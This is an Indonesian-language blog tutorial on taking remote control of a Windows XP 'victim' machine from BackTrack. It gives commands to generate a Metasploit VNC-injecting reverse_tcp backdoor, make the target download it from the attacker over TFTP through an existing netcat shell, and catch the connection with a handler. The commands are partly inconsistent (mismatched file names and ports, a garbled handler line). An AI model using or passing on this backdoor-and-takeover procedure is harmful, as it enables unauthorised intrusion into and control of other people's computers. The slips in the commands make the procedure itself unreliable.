Remote paksa kompi target dengan backtrack

  No comments

Pada tutorial kali ini saya akan menjelaskan cara meremote komputer target dengan backtrack berikut langkah - langkahnya :

komputer penyerang
- ip addr : 192.168.1.34
- os : backtrack R2
komputer target
- ip addr : 192.168.1.33
- os windows xp sp2
Diakesnya shell via netcat akan membuka kita untuk mengakses komputer korban
powned windows with netcat
Langkah berikutnya kita harus membuat backdoor lagi .. hahaha maap ya.. kebanyakan bikin backdoor deh  Kalo pada tutorial sebelumnya kita membuat backdoor.exe yang di sisipi netcat kali ini kita buat backdoor via metasploit untuk membuka akses reverse_tcp yang nantinya akan membuat koneksi vnc …okey ..
ikuti langkah-langkah berikut ini
root@IBTeam:~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.34 LPORT=2482 x > /tmp/zee-ganteng.exe
ket : windows/vncinject/reverse_tcp —- payload yang di gunakan
LHOST = isikan ip anda
LPORT = isikan port yang memungkinkan ..
/tmp = direktori di mana kita akan mengesave backdoor …
mengapa di /tmp ? .. ya karena kita akan menggunakan fasilitas tftp ( default directory tftpd )
backdoor.exe — nama backdoor , bisa gunakan nama sesuai kreasi anda
backdoor sudah tercipta

Seep tahap persiapan telah anda lewati .. sekarang mari kita exploitasi lebih lanjut.. :P . Pindahkan file backdoor yang barusan kita buat tadi ( zee-ganteng.exe ) ke komputer target :D . Dengan ap ? ya dengan TFTPD service .
aktifkan dengan
menu —–>  service —–> TFTPD —–> TFTPD —–> start TFTPD

Sekarang anda mengerti kenapa saya memilih directory /tmp untuk mensave backdoor .. ya karena home directory TFTPD secara default berada di sana… Lanjut kang :D
Untuk memindahkan backdoor tersebut bukanlah hal yang sulit ..
Pada shell windows tadi ketikan perintah :
tftp -i 192.168.1.34 GET /tmp/backdoor.exe

Ok udah sukses perjalanan kita sampai di sini hehehe… sudah saatnya kita action sekarang … buka kembali shell pada tab baru .. masuk ke metasploit
root@IBTeam~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.34 RPORT=2428 DisabledCourtesySHell=true Ewindows/vncinject/reverse_tcpwindows/vncinject/reverse_tcp

Nah tinggal kita jalankan saja file backdoor reverse_tcp tadi :)

Perintah agar runnig hanya dengan menuliskan file yang hendak di esekusi terus enter.. perhatikan gambar di atas.
Setelah backdoor tersebut berhasil di aktifkan … we have the vnc server active

Bagi temen2 yang kurang jelas dengna tutorial ini. Silahkan mendownload video tutorial yang udah ane buat … just for share.. long live open source
video link :
http://www.ziddu.com/download/14923691/vnc.rar.html

No comments :

Post a Comment

Silahkan Kometarnya. . . . .